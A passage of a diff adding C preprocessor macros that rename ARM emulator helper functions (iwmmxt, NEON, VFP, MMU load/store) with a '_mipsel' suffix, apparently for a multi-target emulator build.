+#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mipsel +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mipsel +#define helper_iwmmxt_insr helper_iwmmxt_insr_mipsel +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mipsel +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mipsel +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mipsel +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mipsel +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mipsel +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mipsel +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mipsel +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mipsel +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mipsel +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mipsel +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mipsel +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mipsel +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mipsel +#define helper_iwmmxt_minub helper_iwmmxt_minub_mipsel +#define helper_iwmmxt_minul helper_iwmmxt_minul_mipsel +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mipsel +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_mipsel +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mipsel +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mipsel +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mipsel +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mipsel +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mipsel +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mipsel +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mipsel +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mipsel +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mipsel +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mipsel +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mipsel +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mipsel +#define helper_iwmmxt_packul helper_iwmmxt_packul_mipsel +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mipsel +#define helper_iwmmxt_packuw 
helper_iwmmxt_packuw_mipsel +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mipsel +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mipsel +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_mipsel +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mipsel +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mipsel +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mipsel +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mipsel +#define helper_iwmmxt_slll helper_iwmmxt_slll_mipsel +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mipsel +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mipsel +#define helper_iwmmxt_sral helper_iwmmxt_sral_mipsel +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mipsel +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mipsel +#define helper_iwmmxt_srll helper_iwmmxt_srll_mipsel +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mipsel +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mipsel +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mipsel +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mipsel +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_mipsel +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mipsel +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mipsel +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_mipsel +#define helper_iwmmxt_subub helper_iwmmxt_subub_mipsel +#define helper_iwmmxt_subul helper_iwmmxt_subul_mipsel +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mipsel +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mipsel +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mipsel +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mipsel +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mipsel +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mipsel +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mipsel +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mipsel +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mipsel +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mipsel +#define 
helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mipsel +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mipsel +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_mipsel +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mipsel +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mipsel +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mipsel +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mipsel +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mipsel +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mipsel +#define helper_ldb_cmmu helper_ldb_cmmu_mipsel +#define helper_ldb_mmu helper_ldb_mmu_mipsel +#define helper_ldl_cmmu helper_ldl_cmmu_mipsel +#define helper_ldl_mmu helper_ldl_mmu_mipsel +#define helper_ldq_cmmu helper_ldq_cmmu_mipsel +#define helper_ldq_mmu helper_ldq_mmu_mipsel +#define helper_ldw_cmmu helper_ldw_cmmu_mipsel +#define helper_ldw_mmu helper_ldw_mmu_mipsel +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_mipsel +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mipsel +#define helper_le_ldq_mmu helper_le_ldq_mmu_mipsel +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mipsel +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mipsel +#define helper_le_ldul_mmu helper_le_ldul_mmu_mipsel +#define helper_le_lduw_mmu helper_le_lduw_mmu_mipsel +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mipsel +#define helper_le_stl_mmu helper_le_stl_mmu_mipsel +#define helper_le_stq_mmu helper_le_stq_mmu_mipsel +#define helper_le_stw_mmu helper_le_stw_mmu_mipsel +#define helper_msr_i_pstate helper_msr_i_pstate_mipsel +#define helper_neon_abd_f32 helper_neon_abd_f32_mipsel +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mipsel +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mipsel +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mipsel +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mipsel +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mipsel +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mipsel +#define 
helper_neon_abd_s16 helper_neon_abd_s16_mipsel +#define helper_neon_abd_s32 helper_neon_abd_s32_mipsel +#define helper_neon_abd_s8 helper_neon_abd_s8_mipsel +#define helper_neon_abd_u16 helper_neon_abd_u16_mipsel +#define helper_neon_abd_u32 helper_neon_abd_u32_mipsel +#define helper_neon_abd_u8 helper_neon_abd_u8_mipsel +#define helper_neon_abs_s16 helper_neon_abs_s16_mipsel +#define helper_neon_abs_s8 helper_neon_abs_s8_mipsel +#define helper_neon_acge_f32 helper_neon_acge_f32_mipsel +#define helper_neon_acge_f64 helper_neon_acge_f64_mipsel +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mipsel +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mipsel +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mipsel +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mipsel +#define helper_neon_addl_u16 helper_neon_addl_u16_mipsel +#define helper_neon_addl_u32 helper_neon_addl_u32_mipsel +#define helper_neon_add_u16 helper_neon_add_u16_mipsel +#define helper_neon_add_u8 helper_neon_add_u8_mipsel +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mipsel +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mipsel +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mipsel +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mipsel +#define helper_neon_cge_f32 helper_neon_cge_f32_mipsel +#define helper_neon_cge_s16 helper_neon_cge_s16_mipsel +#define helper_neon_cge_s32 helper_neon_cge_s32_mipsel +#define helper_neon_cge_s8 helper_neon_cge_s8_mipsel +#define helper_neon_cge_u16 helper_neon_cge_u16_mipsel +#define helper_neon_cge_u32 helper_neon_cge_u32_mipsel +#define helper_neon_cge_u8 helper_neon_cge_u8_mipsel +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mipsel +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mipsel +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mipsel +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mipsel +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mipsel +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mipsel +#define 
helper_neon_cgt_u8 helper_neon_cgt_u8_mipsel +#define helper_neon_cls_s16 helper_neon_cls_s16_mipsel +#define helper_neon_cls_s32 helper_neon_cls_s32_mipsel +#define helper_neon_cls_s8 helper_neon_cls_s8_mipsel +#define helper_neon_clz_u16 helper_neon_clz_u16_mipsel +#define helper_neon_clz_u8 helper_neon_clz_u8_mipsel +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mipsel +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mipsel +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mipsel +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mipsel +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mipsel +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mipsel +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mipsel +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mipsel +#define helper_neon_hadd_u8 helper_neon_hadd_u8_mipsel +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mipsel +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mipsel +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mipsel +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mipsel +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mipsel +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mipsel +#define helper_neon_max_s16 helper_neon_max_s16_mipsel +#define helper_neon_max_s32 helper_neon_max_s32_mipsel +#define helper_neon_max_s8 helper_neon_max_s8_mipsel +#define helper_neon_max_u16 helper_neon_max_u16_mipsel +#define helper_neon_max_u32 helper_neon_max_u32_mipsel +#define helper_neon_max_u8 helper_neon_max_u8_mipsel +#define helper_neon_min_s16 helper_neon_min_s16_mipsel +#define helper_neon_min_s32 helper_neon_min_s32_mipsel +#define helper_neon_min_s8 helper_neon_min_s8_mipsel +#define helper_neon_min_u16 helper_neon_min_u16_mipsel +#define helper_neon_min_u32 helper_neon_min_u32_mipsel +#define helper_neon_min_u8 helper_neon_min_u8_mipsel +#define helper_neon_mull_p8 helper_neon_mull_p8_mipsel +#define helper_neon_mull_s16 helper_neon_mull_s16_mipsel +#define 
helper_neon_mull_s8 helper_neon_mull_s8_mipsel +#define helper_neon_mull_u16 helper_neon_mull_u16_mipsel +#define helper_neon_mull_u8 helper_neon_mull_u8_mipsel +#define helper_neon_mul_p8 helper_neon_mul_p8_mipsel +#define helper_neon_mul_u16 helper_neon_mul_u16_mipsel +#define helper_neon_mul_u8 helper_neon_mul_u8_mipsel +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mipsel +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mipsel +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mipsel +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mipsel +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mipsel +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mipsel +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mipsel +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mipsel +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mipsel +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mipsel +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mipsel +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mipsel +#define helper_neon_negl_u16 helper_neon_negl_u16_mipsel +#define helper_neon_negl_u32 helper_neon_negl_u32_mipsel +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mipsel +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mipsel +#define helper_neon_padd_u16 helper_neon_padd_u16_mipsel +#define helper_neon_padd_u8 helper_neon_padd_u8_mipsel +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mipsel +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mipsel +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mipsel +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mipsel +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mipsel +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mipsel +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mipsel +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mipsel +#define 
helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mipsel +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mipsel +#define helper_neon_qabs_s16 helper_neon_qabs_s16_mipsel +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mipsel +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mipsel +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mipsel +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mipsel +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mipsel +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mipsel +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mipsel +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mipsel +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mipsel +#define helper_neon_qadd_u64 helper_neon_qadd_u64_mipsel +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mipsel +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mipsel +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mipsel +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mipsel +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mipsel +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mipsel +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mipsel +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mipsel +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mipsel +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mipsel +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mipsel +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mipsel +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mipsel +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_mipsel +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mipsel +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mipsel +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mipsel +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mipsel +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mipsel +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mipsel +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mipsel 
+#define helper_neon_qshl_u16 helper_neon_qshl_u16_mipsel +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mipsel +#define helper_neon_qshl_u64 helper_neon_qshl_u64_mipsel +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mipsel +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mipsel +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mipsel +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mipsel +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mipsel +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mipsel +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mipsel +#define helper_neon_qsub_s64 helper_neon_qsub_s64_mipsel +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mipsel +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mipsel +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mipsel +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mipsel +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mipsel +#define helper_neon_qunzip16 helper_neon_qunzip16_mipsel +#define helper_neon_qunzip32 helper_neon_qunzip32_mipsel +#define helper_neon_qunzip8 helper_neon_qunzip8_mipsel +#define helper_neon_qzip16 helper_neon_qzip16_mipsel +#define helper_neon_qzip32 helper_neon_qzip32_mipsel +#define helper_neon_qzip8 helper_neon_qzip8_mipsel +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mipsel +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mipsel +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mipsel +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mipsel +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mipsel +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_mipsel +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mipsel +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mipsel +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mipsel +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mipsel +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mipsel +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mipsel +#define helper_neon_rshl_u32 
helper_neon_rshl_u32_mipsel +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mipsel +#define helper_neon_rshl_u8 helper_neon_rshl_u8_mipsel +#define helper_neon_shl_s16 helper_neon_shl_s16_mipsel +#define helper_neon_shl_s32 helper_neon_shl_s32_mipsel +#define helper_neon_shl_s64 helper_neon_shl_s64_mipsel +#define helper_neon_shl_s8 helper_neon_shl_s8_mipsel +#define helper_neon_shl_u16 helper_neon_shl_u16_mipsel +#define helper_neon_shl_u32 helper_neon_shl_u32_mipsel +#define helper_neon_shl_u64 helper_neon_shl_u64_mipsel +#define helper_neon_shl_u8 helper_neon_shl_u8_mipsel +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mipsel +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mipsel +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mipsel +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mipsel +#define helper_neon_subl_u16 helper_neon_subl_u16_mipsel +#define helper_neon_subl_u32 helper_neon_subl_u32_mipsel +#define helper_neon_sub_u16 helper_neon_sub_u16_mipsel +#define helper_neon_sub_u8 helper_neon_sub_u8_mipsel +#define helper_neon_tbl helper_neon_tbl_mipsel +#define helper_neon_tst_u16 helper_neon_tst_u16_mipsel +#define helper_neon_tst_u32 helper_neon_tst_u32_mipsel +#define helper_neon_tst_u8 helper_neon_tst_u8_mipsel +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mipsel +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mipsel +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mipsel +#define helper_neon_unzip16 helper_neon_unzip16_mipsel +#define helper_neon_unzip8 helper_neon_unzip8_mipsel +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mipsel +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_mipsel +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mipsel +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mipsel +#define helper_neon_widen_s16 helper_neon_widen_s16_mipsel +#define helper_neon_widen_s8 helper_neon_widen_s8_mipsel +#define helper_neon_widen_u16 helper_neon_widen_u16_mipsel 
+#define helper_neon_widen_u8 helper_neon_widen_u8_mipsel +#define helper_neon_zip16 helper_neon_zip16_mipsel +#define helper_neon_zip8 helper_neon_zip8_mipsel +#define helper_pre_hvc helper_pre_hvc_mipsel +#define helper_pre_smc helper_pre_smc_mipsel +#define helper_qadd16 helper_qadd16_mipsel +#define helper_qadd8 helper_qadd8_mipsel +#define helper_qaddsubx helper_qaddsubx_mipsel +#define helper_qsub16 helper_qsub16_mipsel +#define helper_qsub8 helper_qsub8_mipsel +#define helper_qsubaddx helper_qsubaddx_mipsel +#define helper_rbit helper_rbit_mipsel +#define helper_recpe_f32 helper_recpe_f32_mipsel +#define helper_recpe_f64 helper_recpe_f64_mipsel +#define helper_recpe_u32 helper_recpe_u32_mipsel +#define helper_recps_f32 helper_recps_f32_mipsel +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mipsel +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mipsel +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mipsel +#define helper_ret_stb_mmu helper_ret_stb_mmu_mipsel +#define helper_rintd helper_rintd_mipsel +#define helper_rintd_exact helper_rintd_exact_mipsel +#define helper_rints helper_rints_mipsel +#define helper_rints_exact helper_rints_exact_mipsel +#define helper_ror_cc helper_ror_cc_mipsel +#define helper_rsqrte_f32 helper_rsqrte_f32_mipsel +#define helper_rsqrte_f64 helper_rsqrte_f64_mipsel +#define helper_rsqrte_u32 helper_rsqrte_u32_mipsel +#define helper_rsqrts_f32 helper_rsqrts_f32_mipsel +#define helper_sadd16 helper_sadd16_mipsel +#define helper_sadd8 helper_sadd8_mipsel +#define helper_saddsubx helper_saddsubx_mipsel +#define helper_sar_cc helper_sar_cc_mipsel +#define helper_sdiv helper_sdiv_mipsel +#define helper_sel_flags helper_sel_flags_mipsel +#define helper_set_cp_reg helper_set_cp_reg_mipsel +#define helper_set_cp_reg64 helper_set_cp_reg64_mipsel +#define helper_set_neon_rmode helper_set_neon_rmode_mipsel +#define helper_set_r13_banked helper_set_r13_banked_mipsel +#define helper_set_rmode helper_set_rmode_mipsel +#define 
helper_set_user_reg helper_set_user_reg_mipsel +#define helper_shadd16 helper_shadd16_mipsel +#define helper_shadd8 helper_shadd8_mipsel +#define helper_shaddsubx helper_shaddsubx_mipsel +#define helper_shl_cc helper_shl_cc_mipsel +#define helper_shr_cc helper_shr_cc_mipsel +#define helper_shsub16 helper_shsub16_mipsel +#define helper_shsub8 helper_shsub8_mipsel +#define helper_shsubaddx helper_shsubaddx_mipsel +#define helper_ssat helper_ssat_mipsel +#define helper_ssat16 helper_ssat16_mipsel +#define helper_ssub16 helper_ssub16_mipsel +#define helper_ssub8 helper_ssub8_mipsel +#define helper_ssubaddx helper_ssubaddx_mipsel +#define helper_stb_mmu helper_stb_mmu_mipsel +#define helper_stl_mmu helper_stl_mmu_mipsel +#define helper_stq_mmu helper_stq_mmu_mipsel +#define helper_stw_mmu helper_stw_mmu_mipsel +#define helper_sub_saturate helper_sub_saturate_mipsel +#define helper_sub_usaturate helper_sub_usaturate_mipsel +#define helper_sxtb16 helper_sxtb16_mipsel +#define helper_uadd16 helper_uadd16_mipsel +#define helper_uadd8 helper_uadd8_mipsel +#define helper_uaddsubx helper_uaddsubx_mipsel +#define helper_udiv helper_udiv_mipsel +#define helper_uhadd16 helper_uhadd16_mipsel +#define helper_uhadd8 helper_uhadd8_mipsel +#define helper_uhaddsubx helper_uhaddsubx_mipsel +#define helper_uhsub16 helper_uhsub16_mipsel +#define helper_uhsub8 helper_uhsub8_mipsel +#define helper_uhsubaddx helper_uhsubaddx_mipsel +#define helper_uqadd16 helper_uqadd16_mipsel +#define helper_uqadd8 helper_uqadd8_mipsel +#define helper_uqaddsubx helper_uqaddsubx_mipsel +#define helper_uqsub16 helper_uqsub16_mipsel +#define helper_uqsub8 helper_uqsub8_mipsel +#define helper_uqsubaddx helper_uqsubaddx_mipsel +#define helper_usad8 helper_usad8_mipsel +#define helper_usat helper_usat_mipsel +#define helper_usat16 helper_usat16_mipsel +#define helper_usub16 helper_usub16_mipsel +#define helper_usub8 helper_usub8_mipsel +#define helper_usubaddx helper_usubaddx_mipsel +#define helper_uxtb16 
helper_uxtb16_mipsel +#define helper_v7m_mrs helper_v7m_mrs_mipsel +#define helper_v7m_msr helper_v7m_msr_mipsel +#define helper_vfp_absd helper_vfp_absd_mipsel +#define helper_vfp_abss helper_vfp_abss_mipsel +#define helper_vfp_addd helper_vfp_addd_mipsel +#define helper_vfp_adds helper_vfp_adds_mipsel +#define helper_vfp_cmpd helper_vfp_cmpd_mipsel +#define helper_vfp_cmped helper_vfp_cmped_mipsel +#define helper_vfp_cmpes helper_vfp_cmpes_mipsel +#define helper_vfp_cmps helper_vfp_cmps_mipsel +#define helper_vfp_divd helper_vfp_divd_mipsel +#define helper_vfp_divs helper_vfp_divs_mipsel +#define helper_vfp_fcvtds helper_vfp_fcvtds_mipsel +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mipsel +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mipsel +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mipsel +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_mipsel +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mipsel +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mipsel +#define helper_vfp_maxd helper_vfp_maxd_mipsel +#define helper_vfp_maxnumd helper_vfp_maxnumd_mipsel +#define helper_vfp_maxnums helper_vfp_maxnums_mipsel +#define helper_vfp_maxs helper_vfp_maxs_mipsel +#define helper_vfp_mind helper_vfp_mind_mipsel +#define helper_vfp_minnumd helper_vfp_minnumd_mipsel +#define helper_vfp_minnums helper_vfp_minnums_mipsel +#define helper_vfp_mins helper_vfp_mins_mipsel +#define helper_vfp_muladdd helper_vfp_muladdd_mipsel +#define helper_vfp_muladds helper_vfp_muladds_mipsel +#define helper_vfp_muld helper_vfp_muld_mipsel +#define helper_vfp_muls helper_vfp_muls_mipsel +#define helper_vfp_negd helper_vfp_negd_mipsel +#define helper_vfp_negs helper_vfp_negs_mipsel +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mipsel +#define helper_vfp_shtod helper_vfp_shtod_mipsel +#define helper_vfp_shtos helper_vfp_shtos_mipsel +#define helper_vfp_sitod helper_vfp_sitod_mipsel +#define helper_vfp_sitos 
helper_vfp_sitos_mipsel +#define helper_vfp_sltod helper_vfp_sltod_mipsel +#define helper_vfp_sltos helper_vfp_sltos_mipsel +#define helper_vfp_sqrtd helper_vfp_sqrtd_mipsel +#define helper_vfp_sqrts helper_vfp_sqrts_mipsel +#define helper_vfp_sqtod helper_vfp_sqtod_mipsel +#define helper_vfp_sqtos helper_vfp_sqtos_mipsel +#define helper_vfp_subd helper_vfp_subd_mipsel +#define helper_vfp_subs helper_vfp_subs_mipsel +#define helper_vfp_toshd helper_vfp_toshd_mipsel +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mipsel +#define helper_vfp_toshs helper_vfp_toshs_mipsel +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mipsel +#define helper_vfp_tosid helper_vfp_tosid_mipsel +#define helper_vfp_tosis helper_vfp_tosis_mipsel +#define helper_vfp_tosizd helper_vfp_tosizd_mipsel +#define helper_vfp_tosizs helper_vfp_tosizs_mipsel +#define helper_vfp_tosld helper_vfp_tosld_mipsel +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mipsel +#define helper_vfp_tosls helper_vfp_tosls_mipsel +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mipsel +#define helper_vfp_tosqd helper_vfp_tosqd_mipsel +#define helper_vfp_tosqs helper_vfp_tosqs_mipsel +#define helper_vfp_touhd helper_vfp_touhd_mipsel +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mipsel +#define helper_vfp_touhs helper_vfp_touhs_mipsel +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mipsel +#define helper_vfp_touid helper_vfp_touid_mipsel +#define helper_vfp_touis helper_vfp_touis_mipsel +#define helper_vfp_touizd helper_vfp_touizd_mipsel +#define helper_vfp_touizs helper_vfp_touizs_mipsel +#define helper_vfp_tould helper_vfp_tould_mipsel +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mipsel +#define helper_vfp_touls helper_vfp_touls_mipsel +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mipsel +#define helper_vfp_touqd 
